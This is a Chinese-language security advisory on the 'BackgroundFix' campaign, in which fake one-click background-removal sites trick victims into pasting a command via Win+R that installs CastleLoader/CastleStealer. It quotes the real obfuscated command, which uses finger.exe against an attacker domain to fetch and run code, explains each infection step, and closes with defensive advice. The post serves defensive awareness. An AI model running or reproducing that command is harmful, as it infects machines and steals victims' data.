去背網站竟成駭客溫床!全新惡意攻擊手法 BackgroundFix 製作假的一鍵去背景網站,誘導被害者驗證機器人並複製貼上惡意代碼,暗中植入竊密軟體。資安專家分享三大防範流程,避免電腦遭受重大損失。
你有沒有過這種經驗?精心打扮出門拍了一張網美照,表情、光線、角度通通拿捏得天衣無縫,結果回家仔細一看,後方背景居然有一個大垃圾桶,或者是某個正在張大嘴巴打哈欠的不認識路人。以前遇到這種「差點完美」的遺憾,除非你自己是那種會用複雜電腦修圖軟體的神人,不然這張照片的宿命,通常就是默默被鎖進手機相簿的最深處或是被刪除。
這幾年出現的「一鍵去背景網站」,簡直就是拯救我們相簿的超級英雄。你不需要去上什麼設計課,也不用去記那些讓人頭暈的電腦快捷鍵,只要點開網頁、動動手指把照片拖進去,眼睛眨一下,那些大煞風景的背景就自動蒸發了。這種工具的出現,表面上看起來只是個好玩的小功能,但實際上,它像是一把神奇的數位剪刀,把每個人都變成了自己生活照的「總編輯」。
去背網站也幫我們的日常生活增添了超多樂趣。想幫自家寵物做一組通訊軟體的聊天貼圖?沒問題,去背一下、加個字就搞定。它讓我們不再被「不會修圖」這件事限制住,每個人都能隨心所欲地改造自己的照片。
如此方便的網站功能,也成為駭客攻擊的窗口。以下來說明駭客藉由提供去除照片背景網站服務進行惡意攻擊案例。
一、新的惡意攻擊手法BackgroundFix
BackgroundFix攻擊手法,駭客製作假的一鍵去背景網站,誘使被害者上傳照片去除背景,在過程中上傳照片的動作是假的,重點是執行上傳照片後的指令,依照指令執行完後,被害者的電腦就會被植入CastleStealer(竊密軟體),造成損失。
二、駭客製作去除背景服務網站進行惡意攻擊
調查中發現駭客會透過各種管道(例如:發送釣魚郵件、投放惡意廣告或社群媒體連結等..),散佈含有惡意內容的去除背景網站,誘使被害者上鉤。

駭客製作含有惡意內容的去背景網站
點擊圖片上傳後,會出現一個圖片上傳的畫面,讓被害者信以為真,是真的在進行照片上傳去除背景的動作,慶幸的是目前所知此網站不會儲存上傳的圖片,而只是讓被害者認為真的有在進行圖片上傳的動作,降低戒心。

上傳圖片去背景完成下載畫面
點擊Download
會出現我不是機器人的驗證,但實際上點擊完不是機器人驗證後會複製一段惡意的代碼,待後續貼上執行。

點擊我不是機器人驗證複製惡意代碼
點擊我不是機器人後,就會跳出執行指令的頁面,被害者會被誘導依序執行常見的 Win+R 開啟「執行」對話框和
Ctrl+V 貼上複製內容組合鍵,在不知情的情況下執行上一步已複製的惡意指令。

被害者被誘導輸入並執行惡意指令
實際上將複製的指令貼到文字編輯器發現是一段執行的惡意指令,
%COMSPEC% /k s^t^a^r^t "" /min for /f "skip=8 delims=" %h in ('f^^i^^n^^g^^e^^r nrLeDHDESi@cheeshomireciple[.]com') do call %h & exit && echo ' ---Verify you are human--------press ENTER--- '

在上一步驟點擊我不是機器人時所複製的惡意代碼
三、貼上執行惡意代碼後開始安裝惡意程式造成損失
被害者依照畫面指示貼上執行令被植入惡意程式,造成損失:
(一)、隱藏視窗執行 (start "" /min):
系統會啟動命令提示字元 (%COMSPEC%),但強制以「最小化」的方式在背景運行。這意味著受害者完全不會看到黑色的指令視窗彈出,攻擊會在神不知鬼不覺中進行。
(二)、呼叫內建網路工具 (finger.exe):
腳本會利用 Windows
系統自帶的舊版網路連線工具
finger.exe,向攻擊者控制的惡意伺服器 (cheeshomireciple[.]com) 發送請求。
(三)、下載合法 Python 環境並偽裝成 PDF:
利用系統內建的 curl
工具,從官方
python.org 伺服器下載合法的 Python 執行環境壓縮檔。為了掩人耳目,它會刻意將下載下來的壓縮檔副檔名儲存為
.pdf,讓不小心看到檔案的使用者以為那只是一份普通文件。
(四)、批次檔會執行 start explorer.exe 重新載入檔案總管:
此時受害者的桌面圖示和工具列會重新出現,看起來就像系統稍微卡頓了一下又恢復正常,但實際上
CastleLoader 惡意軟體已被植入開始竊取被害者機敏資料。
四、流程圖

五、防範駭客透過BackgroundFix攻擊植入惡意程式造成損失:
● 建立良好習慣,如果真有需要複製指令執行,請先了解或是查詢這段指令的用途,現在網路資源很發達,很快就可以查到資訊,不要別人提供指令就直接貼上執行非常的危險。
● 定期員工資安訓練或請外部資安專家安排訓練課程,讓員工學習辨識更多的惡意攻擊手法。
有任何資安問題,歡迎隨時與NEITHNET團隊聯繫!
參考資料:
https://www.huntress.com/blog/clickfix-castleloader-backgroundfix